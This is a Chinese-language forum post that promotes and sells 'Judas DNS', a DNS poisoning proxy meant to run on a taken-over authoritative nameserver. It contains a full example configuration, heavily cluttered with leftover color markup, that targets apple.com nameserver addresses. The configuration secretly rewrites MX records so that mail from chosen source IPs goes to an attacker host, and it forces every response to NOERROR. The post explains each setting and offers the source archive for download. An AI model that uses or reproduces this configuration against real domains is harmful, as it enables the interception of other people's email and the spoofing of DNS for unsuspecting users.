Judas DNS –名称服务器DNS中毒攻击工具

a5656456 · 发表于 2020-4-9 17:13:40

Judas DNS是一个名称服务器DNS中毒攻击工具，它充当DNS代理服务器的作用，旨在代替被接管的名称服务器进行部署以执行有针对性的利用。Judas通过将所有DNS查询代理到域的合法名称服务器来工作。 Spam Hack Tools.png

魔力与Judas的规则配置一起提供，可让您根据源IP或DNS查询类型来更改DNS响应。这使攻击者可以配置恶意名称服务器，以进行某些操作，例如有选择地重新路由来自指定源IP范围的入站电子邮件（通过修改的MX记录），设置非常长的TTL以保留有毒记录的缓存等。

如何使用Judas DNS名称服务器DNS中毒攻击工具

以下是针对犹大的示例场景的示例配置，其中攻击者已破坏/接管了苹果公司的权威名称服务器之一（针对apple.com）：

1

[color=rgb(49, 124, 197) !important]2

3

[color=rgb(49, 124, 197) !important]4

5

[color=rgb(49, 124, 197) !important]6

7

[color=rgb(49, 124, 197) !important]8

9

[color=rgb(49, 124, 197) !important]10

11

[color=rgb(49, 124, 197) !important]12

13

[color=rgb(49, 124, 197) !important]14

15

[color=rgb(49, 124, 197) !important]16

17

[color=rgb(49, 124, 197) !important]18

19

[color=rgb(49, 124, 197) !important]20

21

[color=rgb(49, 124, 197) !important]22

23

[color=rgb(49, 124, 197) !important]24

25

[color=rgb(49, 124, 197) !important]26

27

[color=rgb(49, 124, 197) !important]28

29

[color=rgb(49, 124, 197) !important]30

31

[color=rgb(49, 124, 197) !important]32

33

[color=rgb(49, 124, 197) !important]34

35

[color=rgb(49, 124, 197) !important]36

37

[color=rgb(49, 124, 197) !important]38

[color=rgb(51, 51, 51) !important]{
[color=rgb(0, 111, 224) !important] [color=rgb(0, 128, 0) !important]"version"[color=rgb(0, 111, 224) !important]:[color=rgb(0, 111, 224) !important] [color=rgb(0, 128, 0) !important]"1.0.0"[color=rgb(51, 51, 51) !important],
[color=rgb(0, 111, 224) !important] [color=rgb(0, 128, 0) !important]"port"[color=rgb(0, 111, 224) !important]:[color=rgb(0, 111, 224) !important] [color=rgb(206, 0, 0) !important]2248[color=rgb(51, 51, 51) !important],
[color=rgb(0, 111, 224) !important] [color=rgb(0, 128, 0) !important]"dns_query_timeout"[color=rgb(0, 111, 224) !important]:[color=rgb(0, 111, 224) !important] [color=rgb(206, 0, 0) !important]10000[color=rgb(51, 51, 51) !important],
[color=rgb(0, 111, 224) !important] [color=rgb(0, 128, 0) !important]"target_nameservers"[color=rgb(0, 111, 224) !important]:[color=rgb(0, 111, 224) !important] [color=rgb(51, 51, 51) !important][[color=rgb(0, 111, 224) !important] [color=rgb(0, 128, 0) !important]"17.254.0.59"[color=rgb(51, 51, 51) !important],[color=rgb(0, 111, 224) !important] [color=rgb(0, 128, 0) !important]"17.254.0.50"[color=rgb(51, 51, 51) !important],[color=rgb(0, 111, 224) !important] [color=rgb(0, 128, 0) !important]"17.112.144.50"[color=rgb(51, 51, 51) !important],[color=rgb(0, 111, 224) !important] [color=rgb(0, 128, 0) !important]"17.112.144.59"[color=rgb(51, 51, 51) !important],[color=rgb(0, 111, 224) !important] [color=rgb(0, 128, 0) !important]"17.171.63.30"[color=rgb(51, 51, 51) !important],[color=rgb(0, 111, 224) !important] [color=rgb(0, 128, 0) !important]"17.171.63.40"[color=rgb(51, 51, 51) !important],[color=rgb(0, 111, 224) !important] [color=rgb(0, 128, 0) !important]"17.151.0.151"[color=rgb(51, 51, 51) !important],[color=rgb(0, 111, 224) !important] [color=rgb(0, 128, 0) !important]"17.151.0.152"[color=rgb(0, 111, 224) !important] [color=rgb(51, 51, 51) !important][color=rgb(51, 51, 51) !important],
[color=rgb(0, 111, 224) !important] [color=rgb(0, 128, 0) !important]"rules"[color=rgb(0, 111, 224) !important]:[color=rgb(0, 111, 224) !important] [color=rgb(51, 51, 51) !important][
[color=rgb(0, 111, 224) !important]       [color=rgb(51, 51, 51) !important]{
[color=rgb(0, 111, 224) !important]          [color=rgb(0, 128, 0) !important]"name"[color=rgb(0, 111, 224) !important]:[color=rgb(0, 111, 224) !important] [color=rgb(0, 128, 0) !important]"Secretly redirect all emails coming from 127.0.0.1!"[color=rgb(51, 51, 51) !important],
[color=rgb(0, 111, 224) !important]          [color=rgb(0, 128, 0) !important]"query_type_matches"[color=rgb(0, 111, 224) !important]:[color=rgb(0, 111, 224) !important] [color=rgb(51, 51, 51) !important][[color=rgb(0, 111, 224) !important] [color=rgb(0, 128, 0) !important]"MX"[color=rgb(0, 111, 224) !important] [color=rgb(51, 51, 51) !important][color=rgb(51, 51, 51) !important],
[color=rgb(0, 111, 224) !important]          [color=rgb(0, 128, 0) !important]"ip_range_matches"[color=rgb(0, 111, 224) !important]:[color=rgb(0, 111, 224) !important] [color=rgb(51, 51, 51) !important][[color=rgb(0, 111, 224) !important] [color=rgb(0, 128, 0) !important]"127.0.0.1/32"[color=rgb(0, 111, 224) !important] [color=rgb(51, 51, 51) !important][color=rgb(51, 51, 51) !important],
[color=rgb(0, 111, 224) !important]          [color=rgb(0, 128, 0) !important]"modifications"[color=rgb(0, 111, 224) !important]:[color=rgb(0, 111, 224) !important] [color=rgb(51, 51, 51) !important][
[color=rgb(0, 111, 224) !important]             [color=rgb(51, 51, 51) !important]{
[color=rgb(0, 111, 224) !important]                   [color=rgb(0, 128, 0) !important]"answer"[color=rgb(0, 111, 224) !important]:[color=rgb(0, 111, 224) !important] [color=rgb(51, 51, 51) !important][
[color=rgb(0, 111, 224) !important]                      [color=rgb(51, 51, 51) !important]{
[color=rgb(0, 111, 224) !important]                         [color=rgb(0, 128, 0) !important]"name"[color=rgb(0, 111, 224) !important]:[color=rgb(0, 111, 224) !important] [color=rgb(0, 128, 0) !important]"apple.com"[color=rgb(51, 51, 51) !important],
[color=rgb(0, 111, 224) !important]                         [color=rgb(0, 128, 0) !important]"type"[color=rgb(0, 111, 224) !important]:[color=rgb(0, 111, 224) !important] [color=rgb(206, 0, 0) !important]15[color=rgb(51, 51, 51) !important],
[color=rgb(0, 111, 224) !important]                         [color=rgb(0, 128, 0) !important]"class"[color=rgb(0, 111, 224) !important]:[color=rgb(0, 111, 224) !important] [color=rgb(206, 0, 0) !important]1[color=rgb(51, 51, 51) !important],
[color=rgb(0, 111, 224) !important]                         [color=rgb(0, 128, 0) !important]"ttl"[color=rgb(0, 111, 224) !important]:[color=rgb(0, 111, 224) !important] [color=rgb(206, 0, 0) !important]10[color=rgb(51, 51, 51) !important],
[color=rgb(0, 111, 224) !important]                         [color=rgb(0, 128, 0) !important]"priority"[color=rgb(0, 111, 224) !important]:[color=rgb(0, 111, 224) !important] [color=rgb(206, 0, 0) !important]10[color=rgb(51, 51, 51) !important],
[color=rgb(0, 111, 224) !important]                         [color=rgb(0, 128, 0) !important]"exchange"[color=rgb(0, 111, 224) !important]:[color=rgb(0, 111, 224) !important] [color=rgb(0, 128, 0) !important]"hacktheplace.localhost"
[color=rgb(0, 111, 224) !important]                      [color=rgb(51, 51, 51) !important]}
[color=rgb(0, 111, 224) !important]                   [color=rgb(51, 51, 51) !important]
[color=rgb(0, 111, 224) !important]             [color=rgb(51, 51, 51) !important]}
[color=rgb(0, 111, 224) !important]          [color=rgb(51, 51, 51) !important]
[color=rgb(0, 111, 224) !important]       [color=rgb(51, 51, 51) !important]}[color=rgb(51, 51, 51) !important],
[color=rgb(0, 111, 224) !important]       [color=rgb(51, 51, 51) !important]{
[color=rgb(0, 111, 224) !important]          [color=rgb(0, 128, 0) !important]"name"[color=rgb(0, 111, 224) !important]:[color=rgb(0, 111, 224) !important] [color=rgb(0, 128, 0) !important]"Make all responses NOERROR even if they've failed."[color=rgb(51, 51, 51) !important],
[color=rgb(0, 111, 224) !important]          [color=rgb(0, 128, 0) !important]"query_type_matches"[color=rgb(0, 111, 224) !important]:[color=rgb(0, 111, 224) !important] [color=rgb(51, 51, 51) !important][[color=rgb(0, 111, 224) !important] [color=rgb(0, 128, 0) !important]"*"[color=rgb(0, 111, 224) !important] [color=rgb(51, 51, 51) !important][color=rgb(51, 51, 51) !important],
[color=rgb(0, 111, 224) !important]          [color=rgb(0, 128, 0) !important]"modifications"[color=rgb(0, 111, 224) !important]:[color=rgb(0, 111, 224) !important] [color=rgb(51, 51, 51) !important][
[color=rgb(0, 111, 224) !important]             [color=rgb(51, 51, 51) !important]{
[color=rgb(0, 111, 224) !important]                   [color=rgb(0, 128, 0) !important]"header"[color=rgb(0, 111, 224) !important]:[color=rgb(0, 111, 224) !important] [color=rgb(51, 51, 51) !important]{
[color=rgb(0, 111, 224) !important]                      [color=rgb(0, 128, 0) !important]"rcode"[color=rgb(0, 111, 224) !important]:[color=rgb(0, 111, 224) !important] [color=rgb(206, 0, 0) !important]0
[color=rgb(0, 111, 224) !important]                   [color=rgb(51, 51, 51) !important]}
[color=rgb(0, 111, 224) !important]             [color=rgb(51, 51, 51) !important]}
[color=rgb(0, 111, 224) !important]          [color=rgb(51, 51, 51) !important]
[color=rgb(0, 111, 224) !important]       [color=rgb(51, 51, 51) !important]}
[color=rgb(0, 111, 224) !important] [color=rgb(51, 51, 51) !important]
[color=rgb(51, 51, 51) !important]}

上面的配置值用途如下：

version：配置文件格式版本（目前始终为1.0.0）。
port： Judas端口应在其上运行。
dns_query_timeout：放弃上游目标名称服务器的回复之前要等待的毫秒数。
target_nameservers：您目标域的合法名称服务器，所有DNS查询将在此处代表所有发出请求的客户端从Judas发送。
规则：对DNS响应进行修改（如果匹配）的规则列表。
- 名称：给定规则的名称。
- query_type_matches：要匹配的查询类型的列表，例如CNAME，A等。也可以指定通配符（*）以匹配任何查询类型。
- ip_range_matches：要匹配的IP范围列表。用于选择性地欺骗对特定IP地址范围的响应。
- 修改：请参见本自述文件的“修改”部分。 JudasDNS-master.zip (6.71 KB, 下载次数: 6, 售价: 5 美金)
  
  2020-4-9 17:13 上传
  点击文件名下载附件

[牛逼工具] Judas DNS –名称服务器DNS中毒攻击工具

温馨提示：